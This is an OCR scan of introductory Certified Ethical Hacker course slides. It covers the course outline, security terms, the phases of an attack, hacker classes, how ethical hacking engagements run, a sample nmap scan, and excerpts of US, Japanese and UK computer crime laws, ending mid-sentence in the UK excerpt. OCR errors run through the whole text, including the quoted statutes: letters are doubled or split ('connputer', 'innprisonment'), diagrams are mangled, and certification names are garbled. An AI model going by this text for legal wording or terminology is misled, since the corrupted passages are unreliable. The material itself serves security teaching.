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© Name 

© Company Affi I i ati on 
© Title/ Function 
©J ob Responsibility 
© System security related experience 
©Expectations 



Course Materials 



Identity Card 
Student Courseware 
Lab Manual/ Workbook 
Compact Disc 
Course Evaluation 
Reference M aterials 
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Course Outline 



© Module I: Introduction to Ethical Hacking 
© Modulell: Footprinting 
© Modulelll: Scanning 
© Module IV: Enumeration 
© Module V: System Hacking 
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Course OutI i ne (contd.) 



© Module VI : Trojans and Backdoors 
© Module VI I: Sniffers 
© ModuleVIII: Denial of Service 
© Module IX: Social Engineering 
© ModuleX: Session Hijacking 
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Course OutI i ne (contd.) 



© M odule XI : H acki ng Web Servers 

© ModuleXII: Web Application Vulnerabilities 

© Module XI 1 1 : Web Based Password Cracking 
Techniques 

© ModuleXIV: SQL Injection 

© Module XV: Hacking Wireless Networks 
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Course OutI i ne (contd.) 



© M odule XVI : Viruses 

© ModuleXVII: Physical Security 

© ModuleXVIII: Linux Hacking 

© ModuleXIX: Evading I DS, Firewalls and Honey pots 

© ModuleXX: Buffer Overflows 

© M odule XXI : Cryptography 

© ModuleXXI I: Penetration Testing 
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K-Council Certified e- business 
Certification Program 



There are several levels of certification tracks under BC-Council Accreditation 
body: 

I Certi f i ed e- B usi ness Associ ate 

2. Certified e- Business Professional 

3. Certified e-Busi ness Consultant 

4. E-H-Certified Technical Consultant 

5. Certified Ethical Hacker (CEH) ^Youarehere 

6. Computer Hacking Forensic I nvesti gator (CH Fl ) 

7. EC-Council Certified Security Analyst (ECSA) 

8. EC-Council Certified Secure Programmer (ECSA) 

9. Certified Secure Application Developer (CSAD) 
ID. Licensed Penetration Tester (LPT) 

II Master of Security Science (MSS) 
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BC-Council Certified Ethical Hacker 



Certified Ethical Hacker Track 



Complete the following steps 



START 




Pastt Lhe follAwing exums^ 



Ethical HaddnG and Countermeasures Exam (giz-so) 




Attend 
Security 
Training 



Prepare 
for Exam 
312-50 




/ Take \ Pail 
< Exam ^ ' 



c 



Certified 



TM 



EH 



Ethical Hacker 



Cerdfl cation 




Certification Achieved 
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student Facilities 



Class Hours 

v 



Building Hours 


m 

' J 




Parking ^ 


) 




Restroonns 

V 






Meals f 

V 
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Phones 




M essages 




Snnoking 




Recycling 





© Lab Sessions are designed 
to rei nf orce tlie cl assroom 
sessions 

© Tlie sessions are intended 
to givea liands on 
experience only and does 
not guarantee proficiency. 
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Ethical Hacking 



Module I 

I ntroduction to Ethical 
H acki ng 



Module Objectives 



©Understanding the 
i mportance of security 

©Introducing Ethical 
H acki ng and essenti a! 
termi nol ogy for the modul e 

©J ob role of an ethical 
hacker: Why choose 
hacki ng as a profession? 

©Ethical hacking vis-a-vis 
Penetration Testing 

©Understanding the 
different phases involved in 
a hacking exploit 



©I ntroducing hacking 
technologies 

©Overview of attacks and 
identification of exploit 
categories 

©Comprehending ethical 
hacki ng 

©Legal implications of 
hacki ng 

©Hacking, law, and 
punishment 
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Module Flow 



The Need for Security 



Essential Terminology 



E I ements of Secu r i ty 



Hacking Cycle 



Malicious Hacker Act 




Hacktivism 



Hacker Classes 




Computer Crimes 
and I mpli cations 



Need for Ethical Hacking 
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Problem Definition - Why Security? 



© Evolution of teclinology 
focused on ease of use 



1 Microsoft Internet Explorer Drag and Drop Vulnerability 


Secunia Advisory: 


SA12321 


Release Date: 


2004-08-19 


Last Update: 


2004-10-12 


Critical: 


1 




Hiahlv critical 


Impact: 


S'/Etem access 


Where: 


From remote 



©I ncreased networked 
environnnent and network 
based applications 
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©Decreasing ski 1 1 level needed for exploits 



Inti'Licler 
Knowledge 



^ packet apsofing 

X snrffers 
\ 

\ 

I 

hack doors i ' 



croES site scripting 



"staalth"yad^l^ need 
Ejcanning techniques 

denial of aanica 



staged 
attack 



diiabling audilE, 





jdBlributed 
! attack tools 



Attiick 

Sophistication 



ifiNi attacks 
lautojnated prolDesf'scans 

'GUI 

I net^jork managem ent 
^ diagnostics 

I hijacking ^ 
sessions. ^ 



iburglariaB 

exploiting knov^n vulnerabilities 
passv/ord crocking 



s.elf-rieplicating coda 
paE^^ord guessing 



1990 



1990 



1995 



2000 
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Problem Definition - Why Security? 





Bookie reveals S 100,000 cost of deni a l-of -service 
extortiDii attacks 

June 11 2004 

by Andy l^cCue 

And that's just for starters - an online betting site 
tells all to silicon.com... 






©Direct innpact of security breach on 
corporate asset base and goodwi 1 1 







"Our first attack was in November last year. We got a demand for $50,000 from an 
unidentified source." These are the words of a UK-based online bookmaker who has 
agreed to speak to silicon.com, on condition of anonymity, to reveal the full scale of the 
denial of service exlortion threats that betting sites have been battling against for nine 
months. 



©Increasing complexity of computer infrastructure administration and 
management 
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Essential Terminology 



© Threat - An action or event that 
might prejudice security. A threat is 
a potential violation of security. 





© Vulnerability - Existence of a weakness, 
design, or implementation error that can 
lead to an unexpected, undesirable event 
compromising the security of the system. 



© Target of Evaluation - An IT system, 
product, or component that is 
identified/ subjected as requiring security 
evaluation. 





© Attack - An assault on system security 
that derives from an i ntel I i gent threat. An 
attack is any action that violates security. 



© Exploit - A 




defined way to 


breach the 




security of an IT 


system through 


vulnerability. 
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Elements of Security 



© Security - A state of well-being of 
information and infrastructures in 
which the possibility of successful 
yet undetected theft, tampering, 
and disruption of information and 
services is kept low or tolerable. 



Security 
authenti 





3^ 



/ 



Any hacki ng event wi 1 1 affect any one or 
more of the essential security elements. 



rests on confidentiality, 
city, integrity, and availability 

•Confidentiality - The 
concealment of Information or 
resources. 

•Authenticity - The Identification 
and assurance of the origin of 
Information. 

•integrity- The trustworthiness 
of data or resources I n terms of 
preventi ng I mproper and 
unauthorized changes. 
•Availability - The ability to use 
the Information or resource 
desi red. 



BC-Councll 



Copyright © byBC-Council 
All Rights reserved. Reproduction is strictly prohibited 



The Security, Functionality, and Ease 
of Use Triangle 



© The nunnber of exploits gets nnininnized when the nunnber of 
weaknesses is reduced => greater security 

© Takes more effort to conductsametask=> reduced functionality 



Functionality 



Security 




©Moving towards 
security means moving 
away from functionality 
and ease of use. 
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Ease of Use 
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Case Study 



WORM'S EFFECTS 

Customers of the Canadian 
Imperial Bank of Commerce in 
Toronto were unable to witlidraw 
money using ATMs during part of 
Saturday. 

Korea Telecom Freetel and SK 
Telecom service failed, stranding 
millions of South Korean Internet 
users. 

Internet congestion prevented 
consumers from contacting 
Microsoft overthe Internet to unlock 
the anti-piracy features of its latest 
products, including the Windows 
XP and Office XP software 
packages. 

The U.S. departments of State, 
Agriculture, Commerce and some 
units of the Defense Department 
appeared hardest hit among 
federal agencies. 



I 



©Alan was stranded at Newark airport. He was to attend his 
f ri end's weddi ng and Conti nental ai rl i nes j ust announced the 
cancellation of his hop-over flight. 

©He decided to purchase a seat on another ai rl i ne, but the 
Bank of Annerica Corp ATM just wouldn't work. 

©AI I seemed wrong with the world as the ai rl i ne staff were 
usi ng pen and paper to take down new reservations. They 
couldn't even confi rm the aval labi I ity. 



COrrr/TECHNOLOGY 



SEARCH Ttie Web r CNN.com f 




Computer worm grounds flights, 
blocks ATMs 



Science & Space 
Health 

Entertainment 



Special Reports 



WASHINGTON (CNN) - A fast- 
moving computer worm 
snarled business and 
government computers 
Saturday, slowing some 
corporate systems to the 
point of inaccessibility. 
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What Does a Malicious Hacker Do? 



©Reconnaissance 

• Active/ passive 

©Scanning 
©Gaining access 

• Operating system 

I eve!/ application level 

• Network level 

• Denial of service 

©jviaintaining access 

• Uploading/ altering/ 
downloading programs 
or data 

©Clearing tracl<s 



1 



5 



Reconnaissance 




Clearing 
Tracks 



Scanning 




Maintaining 
Access 
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Phase 1- Reconnaissance 



I 



© Reconnai ssance refers to the preparatory phase where an attacker 
seeks to gather as nnuch i nf or nnati on as possi bl e about a target of 
evaluation prior to launching an attack. 

© Business Risk: Notable- Generally noted as "rattling the door 
knobs" to see if someone is watching and responding. 

© Could be future poi nt of return when noted for ease of entry for an 
attack when more is known on a broad scale about the target. 
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Recon nai ssance Types 



Passive reconnaissance 
involves acquiring 
information without directly 
interacting with the target. 

For example, searching public 
records or news releases 
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Active reconnaissance involves 
interacting with the target 
directly by any means. 

For example, telephone calls to the 
help desk or technical department 

Copyright © byBC-Council 
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Phase 2 - Scanning 



© 



© 



© 



Scanni ng refers to the pre-attack phase when the hacker scans the ^ 
network for specific information on the basis of information 
gathered during reconnaissance. 

Business Risk: High- Hackers have to get a single point of entry 
to launch an attack. 

Scanning can include use of dialers, port scanners, network 
mapping, sweeping, vulnerability scanners, and so on. 
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starting nmap 3.49 ( http://uuu^insecure.orB/nnap/ > at 2003-12-19 14:2B PST 

Interesting ports on wwu.insecure.org (205.217.153.53): 

I The 1212 por-t5 scanned but not ^hoMi-i beloM are in ^tate ; filtered) 

PORT STHTE SERVICE VERSIDH 

22/tcp open Esh 0penS5H 3.1pl (protocol 1.99) 

25/tcp open sntp qmail sntpd 
53/tcp open domain ISC Bind 9+2,1 

BO/tcp open http fipache httpd 2.0.39 KUnixl mod_perl/1.99_07-dev Perl/v5.6.1> 

113/tcp closed auth 

Device type; general purpose 

Running: LinuH 2.4.KI2.5.X 

□S details: Linun Kernel 2.4.0 - 2.5.20 

Uptime 212,119 dsy^ (^ince Ued May 21 12:3S;2G 2003) 



Nmap 1 



completed — 1 IP address 11 host up) 



led in 33.792 ; 



ind. |nmap- 



S3 -sV -O -F -PI -T4 www.insecure.orc: 



NMAP Scanner 
Front End 
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Phase 3 - Gai ni ng Access 



I 



© Gaining Access refers to the penetration phase. The hacl<er exploits 
the vul nerabi I ity i n the system. 

© The exploit can occur over a LAN , the I nternet, or as a deception or 
theft. Examples include buffer overflows, denial of service, session 
hij acki ng, and password cracki ng. 

© I nf I uenci ng factors i ncl ude architecture and conf i gurati on of the ' 
target system, the ski 1 1 level of the perpetrator, and the initial level 
of access obtai ned . 

© Business Risk: H ighest - The hacker can gain access at the 
operating system level, application level, or network level. 
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Phase 4- Maintaining Access 



© |V| al ntai n 1 ng Access refers to the phase when the hacker tri es to 
^ retai n his ownershi p of the systenn. 

© The hacker has connpronnised the system. 

© H ackers nnay harden the system from other hackers as wel I (to own 
the system) by securi ng thei r excl usi ve access with Backdoors, 
RootKits, or Trojans. 

L Hackers can upload, download, or manipulate data, applications, 
and configurations on the owned system. 
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Phase 5 - Cover i ng Tracks 



© Cover i ng Tracks refers to the activities undertaken by the hacker to 
hide his misdeed. 

© Reasons include the need for prolonged stay, continued use of 
resources, removing evidence of hacking, or avoiding legal action. 

© Examples include Steganography, tunneling, and altering log files. 
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Hacktivism 



I 



© Refers to the idea of hacki ng with or for a 
p cause. 

© Compr i ses of hacl<ers wi th a soci a! or pol i ti cal 
1^ agenda. 

© Ai ms at sendi ng a message through thei r 
hacl<i ng activity and gai ni ng visi bi I ity for thei r 
cause and themselves. 



I 



© Common targets i ncl ude government 

agencies, M NCs, or any other entity perceived 
as bad or wrong by these groups or 
individuals. 

© 1 1 remai ns a fact however, that gai n i ng 

L unauthorized access is a crime, no matter what 
the inten t. 
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ed by 
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Hacker Classes 



Black Hats 

Individuals with 
extraordi nary computi ng 
ski 1 1 s, resorti ng to mal i ci ous 
or destructive activities. 
Also known as cracKers. 




Gray Hats 

I ndividuals who work both 
offensively and defensively at 
various times. 



BC-Gouncil 



White Hats 

I ndividuals professing hacker 
skills and using them for 
defensive purposes. Also 
known as security analysts. 
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©Ethical Hacker Classes 

• Former Black Hats 

- Reformed crackers 

- First-hand experience 

- Lesser credibility perceived 

• White Hats 

- I ndependent security 
consultants (nnay be groups as 
well) 

- Claim to be knowledgeable 
about black hat activities 

• Consulting Firms 

- Part of I CT f i rms 

- Good credentials 
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What do Ethical H ackers Do? 



© "If you know the enemy and know yourself, you need 
not fear the result of a hundred battles." 

- SunTzu, Artof War 



Ethical hackers try to answer the 

following questions: 

What can the intruder see on the 
target system? {Reconnaissance and 
Scanning phases) 
What can an intruder do with that 
information? {Gaining Access and 
Maintaining Access phases) 
Does anyone at the target notice the 
intruders' attempts or successes? 
{Reconnaissance and Covering 
Tracks phases) 




©If hired by any organization, an 
ethical hacker asks the organization 
what it is trying to protect, against 
whom, and what resources it is willing 
to expend in order to gain protection. 4 



1 
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^■illlii 



r 



H acker refers to a person who 
enjoys learning the details of 
computer systems and how to 
stretch thei r capabi I i ti es. 




Hacking descri bes the rapi d 
development of new programs or the 
reverse engi neeri ng of al ready exi sti ng 
software to make the code better and 
more efficient. 
BC-Council 



ileal? 



Cracker refers to a person who uses 
his hacki ng ski 1 1 s for offensi ve 
purposes. 






Ethical hacker refers to 
security professionals who 
apply thei r hacki ng ski I Is for 
defensive purposes. 
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How to Become an Ethical Hacker 



I 



To become an ethical hacker 
you must meet the 
fol lowi ng requi rements: 

© Should be proficient with 
programmi ng and computer 
networking skills 

© Should be familiar with 
vul nerabi I ity research 




© Shoul d have mastery i n 
different hacking techniques 

© Should be prepared to follow a 
strict code of conduct 
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Skill Profile of an Ethical Hacker 




© A computer expert adept at 
technical domains. 

© H as i n-depth l<nowledge of 
target platforms, such as 
Windows, Unix, and Linux. 

© Has exemplary knowledge of 
networking and related 
hardware and software. 

© Knowledgeable about 
security areas and related 
issues. 
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What is Vul nerabi I ity Research? 



© Discovering vulnerabilities and design 
weaknesses that wi 1 1 open an operati ng 
system and its applications to attack or 
misuse. 

© I ncludes both dynamic study of products 
and technologies and ongoing assessment 
of the hacki ng underground. 

© Relevant innovations are released in the 
form of alerts and are delivered within 
product i mprovements for security systems. 

© Can be classified based on: 

• Severity level (low, medium, or high) 

• Exploit range (local or remote) 
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Why H ackers N eed Vul nerabi I i ty 
Research 



© To identify and correct networl< vulnerabilities 

© To protect the network from bei ng attacked by i ntruders 

© To get i nf ormati on that helps prevent security problems 

© To gather information about viruses 

© To fi nd weaknesses i n the network and to alert the network 
administrator before a network attack 

© To know how to recover from a network attack 
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Vulnerability Research Tools 



US-CERT publishes information regarding a variety 
of vul nerabi I i ti es i n "U S-CE RT Vul nerabi 1 1 ti es 
Notes" 

© Si mi I ar to a! erts but contai n I ess i nf ormati on 

© Does not contai n the sol uti ons to al I the 
vulnerabilities 

© Contains vulnerabilities that meet certain criteria 

© Contains information that is useful to the 
administrator 

© Vul nerabi I ity notes can be searched by several key 
fields: name, vulnerability I D number, and CVE- 
name 

© Can be cross checked with the Common 
Vulnerabilities and Exposures (CVE) catalog 

Copyri ght © by BC-Cbunc i I 
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Vul nerabi I ity Research Websites 



I 



© www.windowsfocus.com 
© www.security.com 
© www.securitytracker.conn 
© www. mi crosoft.com/ security 



windowsrocus.conn - windows info. This website is For Siale! - MicrosoFc Internet Explorer 



File Edit 


View Favorites Tools Help 










Back - 


->■ ' O El -^1 ® search [^Favorites | 


m m - m 








Address 1^ 


hl:l:p://'A"A"A'l .sedoparkjng.conriysho'A'parkjng.php4?domain 


=windowsFocus .com 








Google - 


1 ^ 


1 ^Search Web - | ^ 


& 1 blocked •glAutQFill 


^Options ^ 





wi n do wsfocus.com 

This domain may be for sale by its OL^ner! E3 Mo»-e rfetiails. 
mm'r' For windows try these sponsored links: 



Need Andersen Windows? 

North Carolina Window Replacement Come To The Window Experts! 
www.RenewalBvAndersen.com 

Computer Troubleshooting 

Solve your PC problems and speed up your Windows performance now I 
www.tune-up.com 

Replacement Windows 

Compare Replacement Windows from leading manufacturers. Get quote. 
www.searchitliis.ws 

[Replacement Windows 

Online search guide for replacement windows; vinyl, aluminum S. more. 
www.fi nditoniine.ws 
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Related Links 


S3 
S3 
B 


Data Recovery 


Data Security 


Domain Names 


B 


Internet 


B 


ISP 


B 


Web 


B 


Web Desian 


B 
B 
B 


Web DeveloDment 


Web Hostina 


Web Promotion 



Search 



Search the Web , ^ 



^^Pt Buy lihis donriiain 

The domain 

windo wsfocus.com may 

be for sale by its CATier! 
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H ow Do They Go About 1 1? 



I 

© Any security evaluation involves three components: 




Preparation - I n this phase, a formal 
contract is signed that contains a non- 
disclosure clause as well as a legal clause 
to protect the ethi cal hacker agai nst any 
prosecution that nnight otherwise attract 
duri ng the conduct phase. The contract 
al so outi i nes i nf rastructure peri nneter, 
evaluation activities, time schedules, and 
resources aval I able to him. 



Conduct- In this 
phase, the eval uati on 
technical report is 
prepared based on 
testing potential 
vulnerabilities. 
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Conclusion s mthis 
phase, the results of 
the eval uati on are 
communicated to 
the organization or 
sponsors and 
corrective action is 
taken if needed. 
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© Remote network - This 
approach attempts to 
simulate an intruder 
launching an attack over the 
I nternet. 

© Remote dial-up network - 
This approach attempts to 
simulate an intruder 
launching an attack against 
the client's modem pools. 

Local network - This 
approach simulates an 
employee with legal access 
gaining unauthorized access 
over the local network, 
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lical Hacking 



I 



© Stolen equipment - This approach 
simulates theft of a critical 
information resource, such as a laptop 
owned by a strategist that was taken 
from its owner and given to the ethical 
hacker. 

© Social engineering - This approach 
attempts to check the i ntegrity of the 
organization's employees. 

© Physical entry - This approach 
attempts to physically compromise 
the organization's I CT infrastructure. 
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Ethical Hacking Testing 



© There are nnany different fornns of security testi ng. Exannples i ncl ude 
vulnerability scanning, ethical hacking, and penetration testing. 

© Approaches to testi ng are shown below. 

'Black box- With no prior knowledgeof the infrastructure to be 
tested. 

•White box - With a complete knowledge of the network 
infrastructure. 

•Gray box - Also known as I nternal Testi ng. Exami nes the extent of 
access by i nsiders withi n the network. 
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Ethical Hacking Deliverables 



An Ethical Hacking Report : 

© Detai Is the results of the hacki ng activity, 
nnatching it against the work schedule 
deci ded pr i or to the cond uct phase. 

© Vulnerabilities are detai led and avoidance 
measures suggested. Usually delivered in 
hard copy format for security reasons. 





© Issues to consider - Nondisclosure 
clause in the legal contract (availing the 
right information to the right person), 
i nteg r i ty of the eva I ua ti on tea m, 
sensitivity of information 
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Computer Crimes and I mpli cations 



CYBERCRIME - Mici-oson: Internet EKploi-er 




I 



File Edit View Favorites Tools Help 





^Search ^Favorites ^Media 0 




Address 


^ http; //cybercrime, gov/ 







Text 
Only 
Version 




WWW.CYBERCRIME.GOV 



Computer Crime and Iniell&ctual Property Section (CCIPS) 
of the Criminal Division of the U.S, Department of Justice 



Search for: 



II I Search \ Hints. 



Personalized information if you are a. 



Parent Teacher or Student 
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Computer Crime (e.fl., hackinn): Policy ■ Cases ■ Guidance ■ Layvs ■ Documents 
Intellectual Property Crime: Policy ■ Cases ■ Guidance ■ Laws ■ Economic Espionage ■ Documents 

Cybercrime Documents: Press Releases ■ Speeches ■ Testimony ■ Letters ■ Reports ■ Manuals 



Cyberethics Information: Parent or Teacher ■ Kids ■ Related Web Sites 
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Computer Crimes and I mpli cations 



I 



© The Cyber Security Enhancennent Act of 
2002 nnandates life sentences for hackers 
who recklessly endanger the lives of others. 

© TheCSI/FBI 2002 Computer Crime and 
Security Survey noted that 90 percent of 
respondents acknowledged security 
breaches, but only 34 percent reported the 
cr i mes to I aw enforcement agenci es. 

© The FBI computer crimes squad estimates 
that between 85 and 97 percent of computer 
i ntrusions are not even detected. 
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Legal Perspective (U.S. Federal Law) 



Federal Criminal Code Related to Computer Crime: 

0 18 U.S.C. § 1029. Fraud and Related Activity in Connection 
with Access Devices 

0 18 U.S.C. § 1030. Fraud and Related Activity in Connection 
with Computers 

0 18 U.S.C. § B62. Communication Lines, Stations, or 
Systems 

0 18 u s e. § 2510 etseq. Wire and Electronic 

Communications Interception and Interception of Oral 
Communications 

0 18 use. § 2701 etseq. Stored Wire and Electronic 
Communications and Transactional Records Access 
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Section 1029 



Subsection (a) Whoever - 

(1) knowingly and with intent to defraud produces, uses, or traffics in 
one or more counterfeit access devices; 

(2) knowingly and with intent to defraud traffics in or uses one or 
more unauthorized access devices during any one- year period, and 
by such conduct obtains anything of value aggregating $1,000 or 
more duri ng that peri od; 

(3) knowingly and with intent to defraud possesses fifteen or more 
devices which are counterfeit or unauthorized access devices; 

(4) knowingly, and with intent to defraud, produces, traffics in, has 
control or custody of, or possesses device-making equipment; 
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Section 1029 (continued) 



(5) knowingly and with intent to defraud effects transactions, with lor 
more access devices issued to another person or persons, to receive 
payment or any other thi ng of val ue duri ng any 1-year peri od the 
aggregatevalue of which is equal to or greater than $1,000; 

(6) without the authorization of the issuer of the access device, 
knowingly and with intent to defraud solicits a person for the 
purpose of— 

(A) offering an access device; or 

(B) selling information regarding or an application to obtain an access 
device; 

(7) knowingly and with intent to defraud uses, produces, traffics in, 
has control or custody of, or possesses a telecommunications 
instrument that has been modified or altered to obtain 
unauthorized use of telecommunications services; 
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Section 1029 (continued) 



(8) knowingly and with intent to defraud uses, produces, traffics in, 
has control or custody of, or possesses a scanning receiver; 

(9) knowingly uses, produces, traffics in, has control or custody of, or 
possesses hardware or software, knowing it has been configured to 
insert or modify telecommunication identifying information 
associated with or contained in a telecommunications instrument 
so that such instrument may be used to obtain telecommunications 
service without authorization; or 

(10) without the authorization of the credit card system member or its 
agent, knowi ngly and with i ntent to defraud causes or arranges for 
another person to present to the member or its agent, for payment, 
1 or more evi dences or records of transacti ons made by an access 
device. 
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Penalties 



(A) i n the case of an offense that does not occur after a convi cti on for 
another offense under this section-- 

• (i) if the offense is under paragraph (1), (2), (3), (6), (7), or (10) of 
subsection (a), a fine under this title or inriprisonmentfor not more than 
10 years, or both; and 

• (ii) if the offense is under paragraph (4), (5), (8), or (9) of subsection (a), 
a fine under this title or imprisonment for not more than 15 years, or 
both; 

(B) in the case of an offense that occurs after a conviction for another 
offense under this section, a fi ne under this title or i nnprisonnnent for 
not nnorethan 20 years, or both; and 

(C) in either case, forfeiture to the United States of any personal 
property used or i ntended to be used to connnni t the offense. 
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Section 1030- (a)(1) 



Subsection (a) Whoever-- 

(1) having l<nowingly accessed a connputer without authorization or 
exceeding authorized access, and by nneans of such conduct having 
obtained infornnation that has been deternnined by the United States 
Governnnent pursuant to an Executive order or statute to require 
protection against unauthorized disclosurefor reasons of national 
defense or foreign relations, or any restricted data, as defined in 
paragraph y of secti on llof theAtonnic Energy Act of 1954, with 
reason to believe that such information so obtained could be used to 
the i nj ury of the U ni ted States, or to the advantage of any forei gn 
nation willfully connnnunicates, delivers, transnnits, or causes to be 
connnnunicated, delivered, or transnnitted, or attempts to 
communicate, deliver, transmit or cause to be communicated, 
delivered, or transmitted the same to any person not entitled to 
recei ve i t, or wi 1 1 f u 1 1 y retai ns the same and f ai I s to del i ver i t to the 
officer or employee of the United States entitled to receive it; 
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Section ]D30 (2) (A) (B) (C) 



(2) intentionally accesses a computer without 
authorization or exceeds authorized access, and thereby 
obtainS" 

(A) information contained in a financial record of a financial 
institution, or of a card issuer as defined insertion 1602(n) of 
title 15, or contained in afileof aconsunner reporting agency on 
a consumer, as such terms are defined in the Fair Credit 
ReportingAct(15U.S.C. 1681etseq.); 

(B) i nformation from any department or agency of the U nited 
States; or 

(C) information from any protected computer if the conduct 
involved an i nterstate or f orei gn communication; 
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Section 1030 (3) (4) 



(3) intentionally, without authorization to access any nonpublic 
connputer of a department or agency of the U nited States, accesses 
such a connputer of that departnnent or agency that is exclusively 
for the use of the Govern nnent of the U nited States or, i n the case of 
a connputer not exclusively for such use, is used by or for the 
Governnnent of the U nited States and such conduct affects that use 
by or for the Governnnent of the U nited States; 

(4) knowingly and with intent to defraud, accesses a protected 
connputer without authorization, or exceeds authorized access, and 
by nneans of such conduct furthers the i ntended fraud and obtai ns 
anythi ng of val ue, unl ess the obj ect of the fraud and the thi ng 
obtained consists only of the use of the connputer and the value of 
such use is not nnorethan $5,000 in any 1-year period; 
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Section 1030 (5) (A) (B) 



(5)(A)(i) knowingly causes the transmission of a program, 

information, code, or command, and as a result of such conduct, 
intentionally causes damage without authorization, to a protected 
computer; 

(ii) intentionally accesses a protected computer without authorization, 
and as a result of such conduct, recklessly causes dannage; or 

(iii) intentionally accesses a protected computer without authorization, 
and as a result of such conduct, causes damage; and 

(5)(B) by conduct described in clause(i), (ii), or (iii) of subparagraph 
(A), caused (or, in the case of an attempted offense, would, if 
completed, havecaused)-- 
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Section ]D30 (5) (B) (continued) 



(i) loss to lor nnore persons during any 1- year period (and, for 
purposes of an investigation, prosecution, or other proceeding 
brought by the United States only, loss resulting from a related 
course of conduct affecti ng 1 or more other protected computers) 
aggregating at least $5,000 in value; 

(ii) the modification or impairment, or potential modification or 
impairment, of the medical examination, diagnosis, treatment, or 
care of lor more individuals; 

(iii) physical injury to any person; 

(iv) a threat to public health or safety; or 

(v) damage affecting a computer system used by or for a government 
entity in furtherance of the administration of justice, national 
defense, or national security; 
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Section 1030 (6) (7) 



(6) knowingly and with intent to defraud traffics (as defined in section 
1029) in any password or sinnilar infornnation through which a 
connputer nnay be accessed without authorization, if-- 

(A) such trafficl<i ng affects i nterstate or foreign connnnerce; or 

(B) such connputer is used by or for the Government of the U nited States; 

(7) with i ntent to extort fronn any person any nnoney or other thi ng of 
value, transnnits in interstate or foreign connnnerce any 
connnnuni cation containing any threat to cause dannage to a 
protected connputer; 
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Penalties 



(1) (A) a fine under this title or imprisonment for not more than ten years, or 
both, in the case of an offense under subsection (a)(1) of thissection which 
does not occur after a conviction for another offense under this section, or 
an attempt to commit an offense punishable under this subparagraph; and 

(B) a fine under this title or imprisonment for not more than twenty years, or 
both, in the case of an offense under subsection (a)(1) of thissection which 
occurs after a conviction for another offense under this section, or an 
attempt to commit an offense punishable under this subparagraph; 

(2) (A) except as provided in subparagraph (B), a fine under this title or 
imprisonment for not more than oneyear, or both, in the case of an 
offense under subsection (a)(2), (a)(3), (a)(5)(A)(iii), or (a)(6) of this 
section which does not occur after a conviction for another offense under 
this section, or an attempt to commit an offense punishable under this 
subparagraph; 
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Penalties (continued) 



© (B) a fine under this title or imprisonment for not more than 5 
years, or both, in the case of an offense under subsection (a)(2), or 
an attempt to commit an offense punishable under this 
subparagraph, if-- 

• ( i ) the offense was comnni tted for purposes of commerci al advantage 
or private financial gain; 

• (ii) the offense was comnni tted in furtherance of any criminal or 
tortuous act in violation of the Constitution or laws of the United 
States or of any State; or 

• (iii) the value of the information obtained exceeds $5,000; 

© (C) a fine under this title or imprisonment for not more than ten 
years, or both, i n the case of an offense under subsection (a)(2), 
(a)(3) or (a)(6) of this section which occurs after a conviction for 
another offense under this section, or an attempt to commit an 
offense punishable under this subparagraph; 
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Penalties (continued) 



(3)(A) a fine under this title or imprisonment for not more than five 
years, or both, i n the case of an offense under subsection (a)(4) or 
(a)(7) of this section which does not occur after a conviction for 
another offense under this section, or an attempt to commit an 
offense punishable under this subparagraph; and 

(3)(B) a fine under this title or imprisonment for not more than ten 
years, or both, i n the case of an offense under subsection (a)(4), 
(a)(5)(A)(iii), or (a)(7) of this section which occurs after a 
conviction for another offense under this section, or an attempt to 
commit an offense punishable under this subparagraph; and 
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Penalties (continued) 



(4)(A) a fine under this title, innprisonmentfor not nnore than 10 
years, or both, i n the case of an offense under subsection 
(a)(5)(A)(i), or an attempt to connnnitan offense punishable under 
that subsection; 

(4)(B) a fine under this title, innprisonnnentfor not nnore than 5 years, 
or both, in the case of an offenseunder subsection (a)(5)(A)(ii), or 
an attennpt to connnnit an offense punishable under that subsection; 

(4)(C) a fine under this title, innprisonnnentfor not nnore than 20 
years, or both, i n the case of an offense under subsection 
(a)(5)(A)(i) or (a)(5)(A)(ii), or an attennpt to connnnitan offense 
punishable under either subsection, that occurs after a conviction 
for another offense under this section. 
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J apan's Cyber Laws 



Law No. 128 of 1999 (in effect from Februarys, 2000) 
H usei access ki nski hou 

Article 3. No person sliall conduct an act of unautliorized 
computer access. 

(1) An act of making avail able a specific use which is restricted by an access 
control function by nnaking in operation a specific computer having that access 
control function through inputting into that specific computer, via 
telecommunication line, another persons identification code for that access 
control function 

(2) An act of making available a restricted specific use by making in operation a 
specific computer having that access control function through inputting into it, 
via telecommunication line, any information (excluding an identification code) 
or command that can evade the restrictions placed by that access control 
function on that specific use 
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J apan's Cyber Laws 



(3) An act of making avail able a restricted specific use by nnaking in operation 
a specific connputer, whose specific use is restricted by an access control 
function installed into another specific connputer which is connected, via a 
teleconnnnuni cation line, to that specific connputer, through inputting into it, 
via a telecomnnunication, any infornnation or connnnand tnat can evade the 
restriction concerned 

Article4. No person shall provide another person's identification code relating to 
an access control function to a person other than the access adnninistrator for 
that access control function or the authorized user for that identification code, 
in indicating that it is the identification code for which specific connputer's 
specific use, or at the request of a person who has such knowledge, excepti ng 
the case where such acts are conducted by that access admi nistrator, or with 
the approval of that access admi nistrator or of that authorized user 

Article 8. A person who falls under one of the following items shall be punished 
with penal servitude for not more than one year or a f i ne of not more than 
500,000 yen: 

(1) A person who has infringed the provision of Articles, paragraph I 

Article 9. A person who has infringed the provision of Article 4 shall be punished 
with a fine of not more than 300,000 yen 



Copyri ght © by BC-Cbunc i I 

Bo-COUnci I All Rights reserved. Reproduction isstrictly prohibited 



United Kingdom's Cyber Laws 



Computer M isuse Act 1990 

(1) A person isguiltyof an offenseif- 

(a) he causes a computer to perform any function with the i ntent to secure 
access to any program or data held i n any computer, 

(b) the access he intends to secure is unauthorized, and 

(c) hel<nowsatthetimewhen he causes the computer to perform the function 
that that is the case. 

(2) The intent a person has to have to commit an offense under this section need 
not to be directed at: 

(a) any particular program or data, 

(b) a program or data of any particular kind, or 

(c) a program or data held in any particular computer 

(3) A person guilty of an offense under this section shall be liable on summary 
conviction to imprisonment for a term not exceeding six months or to a fine 

not exceeding level 5 on the standard scale or to both. 
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United Kingdom's Cyber Laws 



(4) A person is guilty of an offense under this section if heconnmits an offense 
under section labove (" the unauthorized access offense") with intent 

(a) to commit an offense to which this section applies; or 

(b) to facilitate the commissi on of such an offense and the offense he intends 
to commit or facilitate is referred to below in this section as the further offense 

(5) This section applies to offences 

(a) for which the sentence is fixed by law; or 

(b) for which a person of twenty-one years of age or over (not previously 
convicted) may be sentenced to i mprisonment for a term of five years 

(6) 1 1 is immaterial for the purposes of this section whether the further offense is 
to be committed on the same occasion as the unauthorized access offense or 
on any future occasion. 

(7) A person may be gui Ity of an offense under this section even though the facts 
